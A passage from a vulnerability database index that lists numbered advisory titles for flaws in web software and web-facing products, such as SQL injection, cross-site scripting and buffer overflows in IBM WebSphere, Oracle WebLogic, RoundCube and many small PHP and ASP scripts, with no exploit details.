Server data information disclosure [55473] IBM Lotus Domino Web Access Try Lotus iNotes anyway unspecified [55471] IBM Lotus Domino Web Access script command unspecified [55470] IBM Lotus Domino Web Access ultra-light unspecified [55440] RoundCube Webmail identities.inc path disclosure [55437] RoundCube Webmail error.inc cross-site scripting [55420] Intellicom NetBiter WebSCADA firmware default password [55408] SQL-Ledger admin interface security bypass [55405] LineWeb edit_news.php SQL injection [55402] LineWeb index.php and admin/index.php file include [55358] CARTwebERP component for Joomla! controller file include [55351] F5 Data Manager interface directory traversal [55347] MasterWeb Script newsID SQL injection [55280] list Web addlink.php SQL injection [55248] Freewebscriptz Games user and pass SQL injection [55213] Aptgp webm_email parameter cross-site scripting [55191] FreeWebshop.org initlang.inc.php directory traversal [55190] FreeWebshop.org sub.inc.php SQL injection [55189] FreeWebshop.org multiple weak security [55174] OpenX administrative interface security bypass [55148] VSFTPD-WEBMIN-MODULE unknown unspecified [55145] WebcamXP component for Joomla! Itemid cross-site scripting [55124] webring index.php cross-site scripting [55094] Proverbs Web Calendar calendar.php cross-site scripting [55093] Proverbs Web Calendar calendar.php SQL injection [55072] Jevonweb Guestbook setup.php security bypass [55045] Web Wiz Forums wwForum.mdb information disclosure [55043] Web Wiz NewsPad NewsPad.mdb information disclosure [55027] IBM DB2 Client Interfaces unspecified [55008] webMathematica MSP cross-site scripting [54995] Cisco WebEx WRF Player atrpui.dll buffer overflow [54994] Cisco WebEx WRF Player atas32.dll buffer overflow [54993] Cisco WebEx WRF Player atas32.dll buffer overflow [54992] Cisco WebEx WRF Player ataudio.dll buffer overflow [54991] Cisco WebEx WRF Player atas32.dll buffer overflow [54969] Web Application Firewall index.cgi cross-site scripting [54957] Social Web CMS multiple cross-site request forgery [54956] Social Web CMS index.php cross-site scripting [54955] Social Web CMS module.php information disclosure [54892] eWebquiz QuizID SQL injection [54886] Cisco Adaptive Security Appliances (ASA) WebVPN security bypass [54885] IBM Rational ClearQuest CQWeb information disclosure [54880] Jobscript4Web multiple cross-site request forgery [54841] Cisco WebEx WRF Player buffer overflow [54820] Multiple VMWare products WebWorks cross-site scripting [54817] Multiple Horde products administration interface cross-site scripting [54754] Webmatic unspecifed SQL injection [54753] Webmatic unspecifed cross-site scripting [54692] Kiwi Syslog Server Web Access information disclosure [54668] Webmin and Usermin unspecified cross-site scripting [54665] Multiple Symantec products VRTSweb code execution [54661] HP OpenView Network Node Manager webappmon.exe CGI buffer overflow [54659] HP OpenView Network Node Manager OvWebHelp.exe buffer overflow [54655] HP OpenView Network Node Manager ovwebsnmpsrv.exe buffer overflow [54602] HP Operations Manager ovwebusr default password [54592] IBM WebSphere Portal XMLAccess component unspecified [54542] DAQFactory Web service buffer overflow [54539] Ipswitch WhatsUp NMWebService.exe denial of service [54537] LiteSpeed Web Server post-authentication code execution [54536] LiteSpeed Web Server Lshttpd denial of service [54531] IBM WebSphere Portal People Picker Tag cross-site scripting [54494] IBM WebSphere Application Server V7 Feature Pack for Communications Enabled Applications (CEA) collaboration sesssion spoofing [54395] KR - PHP Web Content Server krgourl.php file include [54297] Google Chrome WebKit denial of service [54296] Google Chrome WebFrameLoaderClient::dispatchDidChangeLocationWithinPage denial of service [54289] ToutVirtual VirtualIQ JMX Console and Web Console command execution [54279] Baby Web Server requests denial of service [54253] HP ProCurve Switch interface cross-site scripting [54249] Web Services module for Drupal unspecified security bypass [54229] IBM WebSphere Application Server Administration Console cross-site scripting [54228] IBM WebSphere Application Server UserRegistry information disclosure [54227] IBM WebSphere Application Server Administration Console cross-site request forgery [54139] RoundCube Webmail modify cross-site request forgery [54138] RoundCube Webmail email cross-site request forgery [54137] Xerox Fiery Webtools summary.php SQL injection [54125] Sun Java Web Start Installer code execution [54065] Sun Java System Web Server unspecified buffer overflow [54024] Cherokee Web Server HTTP directory traversal [54022] Opera Web fonts spoofing [53987] Mozilla Firefox JavaScript web-workers code execution [53957] Cherokee Web Server GET request denial of service [53885] South River Technologies WebDrive WebDrive Service privilege escalation [53872] Oracle BEA Product Suite WebLogic Portal component unspecified [53871] Oracle BEA Product Suite WebLogic Portal component unspecified [53870] Oracle BEA Product Suite WebLogic Portal component unspecified [53834] Websense Email Security and Personal Email Manager email subject cross-site scripting [53833] Websense Email Security and Personal Email Manager multiple cross-site scripting [53832] Websense Email Security and Personal Email Manager STEMWADM.EXE denial of service [53812] IBM Rational RequisitePro ReqWebHelp cross-site scripting [53809] DWebPro file command execution [53799] NaviCOPA Web Server source information disclosure [53797] Webform module for Drupal cache information disclosure [53796] Webform module for Drupal field labels cross-site scripting [53672] AfterLogic WebMail Pro history_storage.aspx cross-site scripting [53667] Palm Pre WebOS unspecified [53651] Palm Pre WebOS email code execution [53612] McAfee Email and Web Security Appliance unspecified information disclosure [53603] Open WebMail unspecified cross-site scripting [53599] BIGACE Web CMS unspecified cross-site request forgery [53586] Java Web Start command launcher Mac OS X buffer overflow [53501] Juniper JUNOS JWeb cross-site scripting [53494] iCRM Basic component for Joomla! admin interface security bypass [53492] SAP GUI EAI WebViewer3D file overwrite [53491] SAP GUI EAI WebViewer2D file overwrite [53482] Cisco ACE XML Gateway and Cisco ACE Web Application Firewall IP address information disclosure [53435] MaxWebPortal forum.asp SQL injection [53431] nginx WebDAV component directory traversal [53350] RADactive I-Load Webcontrol file upload [53349] RADactive I-Load WebCoreModule.ashx directory traversal [53348] RADactive I-Load WebcodeModule.ashx cross-site scripting [53347] RADactive I-Load WebCoreModule.ashx path disclosure [53344] IBM WebSphere Application Server unspecified denial of service [53343] IBM WebSphere Application Server wsadmin JAAS-J2C information disclosure [53342] IBM WebSphere Application Server Eclipse Help cross-site scripting [53322] Novell GroupWise WebAccess User.Theme.index cross-site scripting [53285] IBM WebSphere MQ readahead denial of service [53280] Multi Website Browse SQL injection [53278] NaviCOPA Web Server source information disclosure [53257] BRS WebWeaver scripts security bypass [53256] HotWeb Rentals details.asp SQL injection [53246] WebAuth weblogin/login.fcgi information disclosure [53244] Bugzilla Bug.create WebService SQL injection [53243] Bugzilla Bug.search WebService SQL injection [53229] Webservice-DIC yoyaku_41 unspecified command execution [53191] IBM WebSphere MQ rriDecompress function denial of service [53190] IBM WebSphere MQ server channel pool process denial of service [53189] IBM WebSphere Business Events wberuntimeear application code execution [53086] IBM Lotus Domino Web Access unspecified cross-site scripting [53084] IBM WebSphere Commerce multiple unspecified [53051] IBM WebSphere Application Server doGet and doTrace methods security bypass [53028] Sun Java SE Java Web Start denial of service [52993] QtWeb javascript cross-site scripting [52916] BIGACE Web CMS index.php cross-site scripting [52886] Sun ONE Web Server Search Cross-Site Scripting [52724] Uebimiau Webmail system_admin/admin.ucf information disclosure [52711] FreeNAS WebGUI cross-site request forgery [52704] Non-SOAP Web Service Access [52675] Buildbot Web status cross-site scripting [52660] iScouter PHP Web Portal MySQL Password Retrieval [52651] Webesse E-Card extension for TYPO3 unspecified information disclosure [52645] Webesse Image Gallery extension for TYPO3 unspecified SQL injection [52644] Webesse E-Card extension for TYPO3 unspecified directory traversal [52618] IBM WebSphere Documentation Found [52617] IBM WebSphere Debug Mode Enforcement [52616] IBM WebSphere Configuration Information Disclosure [52604] HTTP request forwarding (Web Proxy) detected [52522] Sun OpenJDK IcedTea Java Web Start code execution [52493] Hitachi Web Server (HWS) reverse proxy function denial of service [52489] Multiple modules for Miniweb index.php SQL injection [52488] Multiple modules for Miniweb index.php cross-site scripting [52480] Web Server Access Control Files Improper Permissions Setting [52479] Web Application Source Code Disclosure Pattern Found [52478] Web.config File Configuration Settings Leakage [52448] TurnkeyForms Web Hosting Directory login SQL injection [52444] Active Web Mail TabOpenQuickTab1 SQL injection [52413] Embedthis Appweb GET request buffer overflow [52398] IBM Websphere Commerce trace information disclosure [52393] IBM WebSphere Partner Gateway console SQL injection [52390] Apple Safari WebKit pluginspage information disclosure [52389] Apple Safari WebKit floating point numbers buffer overflow [52375] IBM WebSphere Application Server ibm-portlet-ext.xmi security bypass [52372] Huawei MT880 admin interface cross-site request forgery [52340] Java Web Start ActiveX Control ATL code execution [52292] Webform module for Drupal unspecified cross-site scripting variant 1 [52273] Windows Security Support Provider Interface credential forwarding [52272] Oracle Web Listener Remote Command Execution [52266] Oracle Application Server Administration Interface [52255] Palm Pre webOS email notification and calendar cross-site scripting [52227] Multi Website index.php SQL injection [52225] TT Web Site Manager index.php SQL injection [52224] Lotus Domino Web Server File Retrieval [52215] simplePHPWeb files.php security bypass [52188] WebStatCaffe visitorduration.php SQL injection [52187] WebStatCaffe multiple scripts cross-site scripting [52177] Epiri Professional Web Browser URI handler denial of service [52162] Django Web server URL handler information disclosure [52146] Web filter rule matched [52145] Web User Authentication Success [52144] Web Authentication Failed [52105] Microsoft Office Web Components ActiveX control buffer overflow [52083] IBM WebSphere Application Server z/OS information disclosure [52082] IBM WebSphere Application Server wsadmin security bypass [52081] IBM WebSphere Application Server migration information disclosure [52079] IBM WebSphere Application Server single sign-on (SSO) with SPNEGO security bypass [52078] IBM WebSphere Application Server Web services weak security [52077] IBM WebSphere Application Server Administrative Configservice API information disclosure variant 1 [52076] IBM WebSphere Application Server CSIv2 security bypass [52075] IBM WebSphere Application Server Administrative Configservice API information disclosure [52074] IBM WebSphere Application Server Service Component Architecture (SCA) feature pack security bypass [51977] Palm Pre WebOS LunaSysMgr code execution [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service [51913] Hutscripts PHP Website Script cid SQL injection [51912] Hutscripts PHP Website Script msg cross-site scripting [51878] EzWebCalendar images file upload [51855] WebDAV MKCOL Method Site Defacement [51854] EZWebSearch results.php cross-site scripting [51815] WebVision news.php SQL injection [51778] WebLeague install.php security bypass [51777] WebLeague profile.php and index.php SQL injection [51759] Oracle BEA Product Suite WebLogic Server component WLS console package unspecified [51758] Oracle BEA Product Suite WebLogic Server component servlet container package unspecified [51731] Cisco Unified Contact Center Express (Cisco Unified CCX) server administration interface directory traversal [51730] Cisco Unified Contact Center Express (Cisco Unified CCX) server administrative interface cross-site scripting [51700] Hitachi Web Server (HWS) SSL spoofing [51699] Multiple Hitachi products Web server reverse proxy denial of service [51672] AwingSoft Web3D Player ActiveX control buffer overflow [51668] WebGUI unspecified cross-site request forgery [51648] WebAsyst Shop-Script index.php cross-site scripting [51647] WebAsyst Shop-Script index.php SQL injection [51601] Palm webOS multiple unspecified [51576] Citrix XenCenterWeb changepw.php cross-site request forgery [51575] Citrix XenCenterWeb console.php cross-site scripting [51574] Citrix XenCenterWeb login.php SQL injection [51573] Citrix XenCenterWeb writeconfig.php code execution [51547] Sun Java System Web Server Java Server information disclosure [51530] IBM Tivoli Identity Manager self-service UI interface cross-site scripting [51490] IBM WebSphere Application Server SOAP request security bypass [51474] Netgear DG632 router webcm directory traversal [51454] Microsoft Office Web Components ActiveX control buffer overflow [51452] Microsoft Office Web Components ActiveX control HTML code execution [51451] Microsoft Office Web Components ActiveX control code execution [51421] Netgear DG632 router webcm authentication bypass [51405] Sun Java Web Console unspecified cross-site scripting [51356] IBM Rational ClearQuest CQWeb server cross-site scripting [51338] Cisco Video Surveillance 2500 Series IP Camera embedded Web server information disclosure [51337] Cisco Adaptive Security Appliance (ASA) Web VPN phishing [51293] IBM WebSphere Application Server JAX-WS WS-Security policy security bypass [51285] Website Publisher unspecified cross-site request forgery [51279] phpDatingClub website.php cross-site scripting [51268] Apple Safari Web Inspector cross-site scripting [51250] WebNMS Framework report/ReportViewAction.do cross-site scripting [51249] Apple Safari WebKit CRLF injection [51228] Apple Safari WebKit clickjacking [51218] Fretsweb player.php and song.php SQL injection [51217] Fretsweb admin/common.php file include [51173] IBM WebSphere Application Server HTTP methods Java Servlet Page (JSP) security bypass [51170] IBM WebSphere Application Server secure login information disclosure [51151] Webmedia Explorer index.php cross-site scripting [51129] AdaptWeb a_index.php SQL injection [51128] AdaptWeb index.php file include [51115] Uebimiau Webmail admin/editor.php file ovwerwrite [51094] phpWebThings fdown.php SQL injection [51052] phpWebThings help.php file include [51042] IBM WebSphere MQ group names weak security [51041] Google Chrome WebKit information disclosure [51040] Google Chrome WebKit code execution [51038] IBM WebSphere MQ client application Client Channel Definition Table (CCDT) buffer overflow [50983] iPlanet Web Server HTTP TRACE cross-site scripting [50965] IBM FileNet Content Manager Web Services Extensible Authentication Framework (WSEAF) security bypass [50957] Web Directory PRO admins.php security bypass [50956] Web Directory PRO backup_db.php information disclosure [50953] Netgear RP614 administration interface cross-site request forgery [50951] Sun Java System Web Server Reverse Proxy Plug-in cross-site scripting [50949] Webform module for Drupal cross-site scripting [50918] WebEyes Guest Book yorum.asp SQL injection [50915] DMXReady Registration Manager webblogmanager.mdb information disclosure [50905] WebCal webCal3_detail.asp SQL injection [50882] IBM WebSphere Application Server IsSecurityEnabled VMM flag information disclosure [50861] Webboard view.php directory traversal [50844] Ston3D WebPlayer and StandalonePlayer system.openURL() command execution [50754] WebMember form.php script SQL injection [50734] Webradev Download Protect GLOBALS[RootPath] file include [50691] Novell GroupWise WebAccess unspecified cross-site scripting [50689] Novell GroupWise WebAccess style expressions cross-site scripting [50688] Novell GroupWise WebAccess session management mechanism unauthorized access [50678] Web Conference Room Free unspecified cross-site scripting [50672] Novell GroupWise WebAccess login page cross-site scripting [50646] Realty Web-Base list_list.php SQL injection [50643] IBM WebSphere Partner Gateway bcgarchive information disclosure [50641] IBM WebSphere MQ client connection buffer overflow [50640] KingSoft WebShield index.php cross-site scripting [50610] OCS Inventory NG interface information disclosure [50603] ClanWeb save.php security bypass [50573] Microsoft Internet Information Services (IIS) WebDAV security bypass [50558] Xerox WorkCentre Web server unspecified command execution [50517] Apple Mac OS X HFS vfs sysctl interface denial of service [50509] Zervit Webserver HTTP POST denial of service [50477] Apple Safari WebKit SVGList buffer overflow [50453] Sun GlassFish Enterprise Server Administration Interface cross-site scripting [50450] Multiple HP products Embedded Web Server unauthorized access [50409] TinyWebGallery init.php code execution [50408] TinyWebGallery init.php file include [50406] RTWebalbum index.php SQL injection [50399] Realty Web-Base admin.php SQL injection [50396] webSPELL language.php file include [50395] webSPELL awards.php SQL injection [50389] WebFileExplorer body.asp code execution [50331] IceWarp Merak Mail Server WebMail cross-site scripting [50328] IBM Tivoli Storage Manager (TSM) Web GUI buffer overflow [50296] QuickTeam qte_web.php file include [50237] DWebPro NTFS Alternate Data Stream information disclosure [50236] DWebPro unspecified directory traversal [50211] Quick 'n Easy Web Server directory traversal [50193] CGI Rescue Web Mailer HTTP header injection [50181] webSPELL file directory traversal [50116] Red Hat Stronghold Secure Web Server unspecified cross-site scripting [50112] Home Web Server GUI denial of service [50089] Zervit Webserver unspecified directory traversal [50079] WB News admin interface authentication bypass [50077] WebPortal CMS indexk.php file include [50076] WebPortal CMS index.php and help.php file include [50067] Oracle WebLogic Server unspecified information disclosure variant 2 [50055] Oracle WebLogic Server component ODSI privilege escalation [50054] Oracle WebLogic Server component WLS Web services read source code [50053] Oracle WebLogic Server component WLS Web services privilege escalation [50052] Oracle WebLogic Server component WLS Web services privilege escalation variant 2 [50051] Oracle WebLogic Server multiple Web plug-ins unspecified code execution, information disclosure, or denial of service [50050] Oracle WebLogic Server multiple Web plug-ins unspecified code execution, information disclosure, or denial of service variant 2 [50049] Oracle Weblogic Server Jrockit privilege escalation [49993] Zervit Webserver HTTP GET denial of service [49967] webClassifieds index.php security bypass [49966] EZ Webitor login.php SQL injection [49962] Horde IMP and Horde Groupware Webmail Edition PGP keys spoofing [49954] MiniWeb index.htm source disclosure [49940] WebCollab unspecified cross-site request forgery [49939] WebCollab tasks.php cross-site scripting [49937] webSPELL BBCode cross-site scripting [49935] Multiple W2B (Web to Business) products conf.inc information disclosure [49925] Apache Geronimo Web Administrative Console cross-site request forgery [49919] Zervit Webserver http_parse_hex() function buffer overflow [49914] Miniweb URI buffer overflow [49908] DivX Web Player STRF (Stream Format) chunk buffer overflow [49896] FreeWebshop.org startmodules.inc.php file include [49893] Novell Teaming web/guest/home cross-site scripting [49885] aspWebCalendar calendar.mdb information disclosure [49861] Yellow Duck Weblog check.php file include [49821] The Puppet Master Webutil details command execution [49820] The Puppet Master Webutil whois command execution [49801] WebFileExplorer body.asp SQL injection [49788] IBM BladeCenter management interface cross-site request forgery [49741] WebFileExplorer db.mdb information disclosure [49730] OpenGoo webpage[url] parameter cross-site scripting [49683] Web Help Desk multiple form fields cross-site scripting [49666] ContentKeeper Web cgi-bin/ck/mimencode command execution [49665] ContentKeeper Web cgi-bin/ck/mimencode directory traversal [49663] ContentKeeper Web benetool privilege escalation [49648] Asbru Web Content Management login.asp cross-site scripting [49647] Asbru Web Content Management page.asp SQL injection [49602] Qt Web Browser HTML denial of service [49597] XBMC websHomePageHandler() buffer overflow [49591] SAP MaxDB webdbm cross-site scripting [49564] Microsoft ISAServer and Microsoft Forefront TMG Web proxy TCP state denial of service [49543] SAP GUI EAI WebViewer3D ActiveX control SaveViewToSessionFile() buffer overflow [49534] IBM WebSphere Application Server XML digital signature security bypass [49532] IBM WebSphere Application Server JAX-RPC WS-Security UsernameToken security bypass [49531] IBM WebSphere Application Server interim fix insecure permissions [49530] webEdition CMS index.php file include [49528] Cisco ASA 5520 WebVPN cross-site scripting [49499] IBM WebSphere Application Server administrative console forced logout session hijacking [49476] Sun Java Web Start GIF buffer overflow [49454] WeBid upldgallery.php file upload [49427] Cisco IOS WebVPN and SSLVPN TCB memory leak denial of service [49425] Cisco IOS WebVPN and SSLVPN HTTPS denial of service [49395] WebCit module for Citadel embeddable_mini_calendar() format string [49391] IBM WebSphere Application Server WS-Security session hijacking [49370] ZyXEL G-570S Web server information disclosure [49369] ZyXEL G-570S Web server security bypass [49368] ZyXEL G-570S Web server denial of service [49308] F5 BIG-IP management interface code execution [49299] Multiple HP products Web server cross-site request forgery [49298] Sitecore CMS Web service information disclosure [49280] JustSystems Ichitaro Web PURAGUINBYUA code execution [49259] Kim Websites login.php SQL injection [49182] WeBid include_path file include [49175] HighPortal web_search.aspx cross-site scripting [49174] HighCMS web_search.aspx cross-site scripting [49169] WEBjump! portfolio_genre.php and news_id.php SQL injection [49164] IBM WebSphere Application Server sample applications cross-site scripting [49163] IBM WebSphere Application Server administrative console cross-site scripting [49138] Dotclear administration interface cross-site scripting [49108] Easy Web Password .ewp file buffer overflow [49106] Amoot Web Directory password SQL injection [49085] IBM WebSphere Application Server Web-based applications security bypass [49070] Easy File Sharing Web Server thumbnail.php directory traversal [49017] Academic Webtools CMS page.php cross-site scripting [48990] Fujitsu Jasmine2000 WebLink cross-site scripting [48989] Fujitsu Jasmine2000 WebLink denial of service [48988] Fujitsu Jasmine2000 WebLink buffer overflow [48965] Cisco Unified MeetingPlace Web Conferencing E-mail Address cross-site scripting [48937] SkyPortal WebLinks module multiple scripts authentication bypass [48908] Microsoft Windows WINS server WPAD and ISATAP registration Web proxy spoofing [48907] Microsoft Windows DNS server WPAD registration Web proxy spoofing [48894] Dassault Systemes Web editor profile card information disclosure [48892] IBM WebSphere Process Server cluster configuration file information disclosure [48891] ZNC webadmin privilege escalation [48888] Cisco Unified MeetingPlace Web Conferencing unauthorized access [48886] IBM WebSphere Application Server for z/OS CSIv2 unspecified [48832] cPanel WHM interface cross-site request forgery [48818] Fujitsu Jasmine2000 WebLink HTTP response splitting [48784] Moodle user editing interface privilege escalation [48704] Galatolo WebManager result.php cross-site scripting [48700] IBM WebSphere Application Server WSPolicy information disclosure [48698] IBM WebSphere Application Server PMI WebSphere Portal denial of service [48696] Den Dating Website Script searchmatch.php SQL injection [48680] FAST ESP management interface cross-site scripting [48659] GoAhead WebServer security handler information disclosure [48658] GoAhead WebServer HTTP POST denial of service [48657] GoAhead WebServer webs.c denial of service [48656] GoAhead WebServer socket disconnect denial of service [48655] GoAhead WebServer sockGen.c weak security [48654] GoAhead WebServer websSafeUrl denial of service [48653] GoAhead WebServer con, nul, clock$ or config$ denial of service [48651] Agavi AgaviWebRouting::gen(null) cross-site scripting [48648] TYPO3 user interface cross-site scripting [48647] BlackBerry Application Web Loader ActiveX control unspecified buffer overflow [48642] IBM WebSphere Message Broker JDBC error log information disclosure [48637] WebFrame index.php file include [48636] WebFrame index.php and menu.php classFiles file include [48602] FotoWeb Login.fwx and Grid.fwx cross-site scripting [48592] Trend Micro InterScan Web Security Suite JSP security bypass [48588] HP OpenView Network Node Manager webappmon.exe and OpenView5.exe command execution [48575] WebKit XMLHttpRequest.cpp information disclosure [48566] AREVA e-terrahabitat WebFGServer privilege escalation [48564] AREVA e-terrahabitat WebFGServer denial of service var2 [48563] AREVA e-terrahabitat WebFGServer denial of service var1 [48545] Rockwell ControlLogix 1756-ENBT/A EtherNet/IP Bridge interface information disclosure [48544] Rockwell ControlLogix 1756-ENBT/A EtherNet/IP Bridge interface URL redirect [48543] Rockwell ControlLogix 1756-ENBT/A EtherNet/IP Bridge interface cross-site scripting [48530] IBM WebSphere Partner Gateway RNIF signature verification bypass [48529] IBM WebSphere MQ queue manager privilege escalation [48528] IBM WebSphere Application Server JSP Windows information disclosure [48527] IBM WebSphere Application Server installation log information disclosure [48526] IBM WebSphere Application Server HTTP AF_UNIX sockets incorrect permissions [48525] IBM WebSphere Application Server libibmaio.so library denial of service [48524] IBM WebSphere Application Server PMI log file information disclosure [48523] IBM WebSphere Application Server Web Server Plugin denial of service [48522] IBM WebSphere Application Server File Transfer servlet information disclosure [48481] WEBalbum photo.php SQL injection [48477] Multiple Cisco products Web authentication denial of service [48404] Novell GroupWise WebAccess HTTP POST information disclosure [48393] Xerox WorkCentre Web server unspecified code execution [48391] Novell GroupWise WebAccess unspecified cross-site request forgery [48390] Novell GroupWise WebAccess email cross-site scripting [48389] Novell GroupWise WebAccess webacc servlet cross-site scripting [48380] IBM WebSphere Application Server administrative console file information disclosure [48379] Profense Web Application Firewall proxy.html cross-site scripting [48378] Profense Web Application Firewall ajax.html cross-site request forgery [48337] WOW - Web On Windows ActiveX Control WriteIniFileString code execution [48287] The Horde IMP Webmail Client smime.php, pgp.php, and message.php cross-site scripting [48208] Web application forced browsing probe detected [48204] Web Help Desk URL cross-site scripting [48202] Web-Calendar Lite main.asp SQL injection [48171] WebSVN listing.php information disclosure [48168] WebSVN create_anchors code execution [48161] Sun Java System Application Server WEB-INF and META-INF information disclosure [48129] RoundCube Webmail HTML cross-site scripting [48112] WowWee Rovio interface information disclosure [48096] 53KF Web IM msg parameter cross-site scripting [48091] Oracle WebLogic Server multiple reviewService samples cross-site scripting [48054] DMXReady Blog Manager inc_webblogmanager.asp SQL injection [48053] DMXReady Blog Manager inc_webblogmanager.asp cross-site scripting [48005] Oracle WebLogic Server component JSP and servlet information disclosure [48004] Oracle WebLogic Server component WLS Web services information disclosure [48003] Oracle WebLogic Server WLS console unspecified cross-site scripting [48002] Oracle WebLogic Server Portal administrative console cross-site scripting [48001] Oracle WebLogic Server multiple Web plug-ins unspecified code execution [47953] Cisco IronPort Encryption Appliance administration interface logout action cross-site request forgery [47952] Cisco IronPort Encryption Appliance administration interface unspecified cross-site request forgery [47936] Excel Viewer OCX ActiveX control OpenWebFile() file execution [47930] PowerPoint Viewer OCX ActiveX control OpenWebFile() file execution [47928] Office Viewer OCX ActiveX control OpenWebFile() file execution [47927] Word Viewer OCX ActiveX control OpenWebFile() file execution [47900] Git gitweb command execution [47825] IBM WebSphere DataPower XML Security Gateway XS40 SSL denial of service [47775] Fujitsu-Siemens WebTransactions application cross-site scripting [47739] SolucionWeb main.php SQL injection [47722] Webboard bview.asp SQL injection [47654] SasCam Webcam Server ActiveX control buffer overflow [47629] webClassifieds index.php SQL injection [47617] Web Email Script index.php SQL injection [47559] WEBERkommunal Facilities extension for TYPO3 unspecified SQL injection [47550] Roundcube Webmail quota image denial of service [47528] GIT gitweb privilege escalation [47517] Extract Website download.php file include [47495] Fujitsu-Siemens WebTransactions WBPublish.exe command execution [47492] webcamXP URL directory traversal [47481] Phpclanwebsite index.php cross-site scripting [47480] Phpclanwebsite box.php and footer.php file include [47478] Phpclanwebsite multiple scripts SQL injection [47468] Free Jokes Website jokes.php SQL injection [47364] Miniweb username parameter SQL injection [47363] WebPhotoPro multiple scripts SQL injection [47348] Discussion Web discussion.mdb information disclosure [47321] CMS ISWEB index.php cross-site scripting [47320] CMS ISWEB index.php SQL injection [47301] Roundcube Webmail html2text.php code execution [47288] IBM WebSphere Portal BasicAuthTAI security bypass [47267] IBM WebSphere Application Server PerfServlet information disclosure [47257] Sun Java Web Console BeginLogin.jsp phishing [47256] Sun Java System Portal Server Web console information disclosure [47221] Ruby WEBrick httputils.rb denial of service [47211] Atlassian JIRA Webwork 1 security bypass [47210] UN Webmaster Marketplace member.php SQL injection [47200] IBM WebSphere Application Server Security component logoutExitPage open redirect [47199] IBM WebSphere Application Server WebContainer HTTP response splitting [47187] WebCAF index.php file include [47186] WebCAF view.php file include [47164] IBM Rational ClearQuest CQ Web cross-site scripting variant2 [47139] Linksys WVC54GC NetCamPlayerWeb11gv2 ActiveX control buffer overflow [47136] IBM WebSphere Application Server Web Services Feature Pack security exposure [47135] IBM WebSphere Application Server SIP information disclosure [47134] IBM WebSphere Application Server JSP unspecified [47058] Sun Java Web Start and Java Plug-in BasicService security bypass [47057] Sun Java Web Start and Java Plug-in applet class security bypass [47056] Sun Java Web Start and Java Plug-in cookies session hijacking [47055] Sun Java Web Start SI_FILEDIR information disclosure [47054] Sun Java Web Start jnlp file code execution [47053] Sun Java Web Start file: protocol sandbox security bypass [47020] WebGUI email attachments code execution [46999] PHP JOBWEBSITE PRO forgot.php security bypass [46998] PHP JOBWEBSITE PRO forgot.php SQL injection [46997] PHP JOBWEBSITE PRO forgot.php cross-site scripting [46992] IBM Rational ClearQuest CQ Web cross-site scripting variant1 [46953] Web Calendar Pro unspecified SQL injection [46952] Web Calendar System calendar.asp SQL injection [46951] Web Calendar System calendar.asp cross-site scripting [46950] WEB Calendar calendar.asp SQL injection [46949] WEB Calendar calendar.asp cross-site scripting [46918] Active Websurvey SurveyTaker.asp SQL injection [46915] Active Web Mail login.aspx SQL injection [46910] eWebquiz start.asp SQL injection [46905] Active Web Helpdesk default.aspx SQL injection [46884] enVision Web console information disclosure [46831] WebStudio eHotel index.php SQL injection [46821] IBM Tivoli Access Manager for e-business WebSEAL denial of service [46818] WebStudio CMS index.php SQL injection [46817] Bandwebsite info.php cross-site scripting [46816] Bandwebsite lyrics.php SQL injection [46807] Apple iPhone Configuration Web Utility HTTP GET directory traversal [46776] Foojan PHP Weblog index.php path disclosure [46680] V-Webmail CONFIG[pear_dir] file include [46679] V-Webmail pop3.php file include [46678] Galatolo WebManager cookie security bypass [46677] Galatolo WebManager index.php SQL injection [46637] Bankoi Webhost Panel login.asp SQL injection [46636] Web Host Directory db information disclosure [46634] Web Host Directory adm and logged cookie parameter authentication bypass [46600] Pi3Web ISAPI denial of service [46597] Apple Safari WebKit information disclosure [46592] Web Host Directory pwd parameter SQL injection [46587] Web Hosting Directory admin/backup/db information disclosure [46586] Web Hosting Directory cookie security bypass [46523] Weblinks component for Joomla! title and description cross-site scripting [46510] wims coqweb and account.sh symlink [46456] Mini Web Calendar cal_default.php cross-site scripting [46455] Mini Web Calendar cal_pdf.php file disclosure [46370] Webbdomain WebShop detail.php cross-site scripting [46369] Webbdomain WebShop detail.php SQL injection [46362] Webbdomain Petition getin.php SQL injection [46360] Webbdomain Polls getin.php SQL injection [46359] Webbdomain Post Card getin.php panel SQL injection [46358] Webbdomain Quiz getin.php SQL injection [46357] Webbdomain WebShop getin.php SQL injection [46298] phpWebSite links.php SQL injection [46279] Webring category.php SQL injection [46222] WebCards admin.php file upload [46203] TYPOlight webCMS search.html cross-site scripting [46193] WebCards admin.php SQL injection [46164] WebSoccer liga.php SQL injection [46161] AWBS (Advanced Webhost Billing System) anti-XSS input cross-site scripting [46160] AWBS (Advanced Webhost Billing System) unspecified SQL injection [46146] Blender BPY_interface.c command execution [46137] WebGUI loadModule() function code execution [46119] Sun Java Web Start showDocument command execution [46061] Microsoft Outlook Web Access (OWA) redir.asp phishing [46050] WebSVN rss.php directory traversal [46048] WebSVN index.php cross-site scripting [46002] IBM WebSphere Application Server CRL weak security [45993] IBM WebSphere Application Server host header denial of service [45955] Macrovision FLEXnet Connect MVSNCLientWebAgent61.WebAgent.1 ActiveX control (isusweb.dll) code execution [45945] WebGUI password recovery feature weak security [45944] WebGUI unspecified cross-site scripting [45941] Hummingbird.XWebHostCtrl.1 ActiveX control (hclxweb.dll) buffer overflow [45937] WEB//NEWS cookie security bypass [45936] WEB//NEWS search.php SQL injection [45918] myWebland myStats hits.php security bypass [45917] myWebland myStats hits.php SQL injection [45912] Oracle WebLogic Server webapps unauthorized access [45911] Oracle Workshop for WebLogic NetUI pageflows unauthorized access [45910] Oracle WebLogic admin applications privilege escalation [45909] Oracle Workshop for WebLogic NetUI tags unauthorized access [45908] Oracle WebLogic authorizer unauthorized access [45875] PhpWebGallery create_function() code execution [45874] PhpWebGallery event_list.php session hijacking [45872] PhpWebGallery comments.php SQL injection [45865] Webscene eCommerce productlist.php SQL injection [45856] V-webmail login.php SQL injection [45855] V-webmail redirect.php phishing [45853] V-webmail login page path disclosure [45849] Iltaweb Alisveris Sistemi urunler.asp SQL injection [45844] Websense Reporter CreateDbInstall.log information disclosure [45787] Apple Mac OS X Weblog weak security [45782] Sun Java System Web Proxy Server FTP subsystem buffer overflow [45709] H-Sphere webshell4 HTTP cross-site request forgery [45707] H-Sphere webshell4 actions.php cross-site scripting [45696] K9 Web Protection multiple authentication bypass [45691] PHP Web Explorer main.php and edit.php file include [45672] JMweb MP3 Music Audio Search and Download Script src file include [45657] Website Directory index.php cross-site scripting [45638] OLIB7 WebView infile parameter file include [45614] H-Sphere WebShell actions.php cross-site request forgery [45613] H-Sphere WebShell actions.php cross-site scripting [45573] Adult Banner Exchange 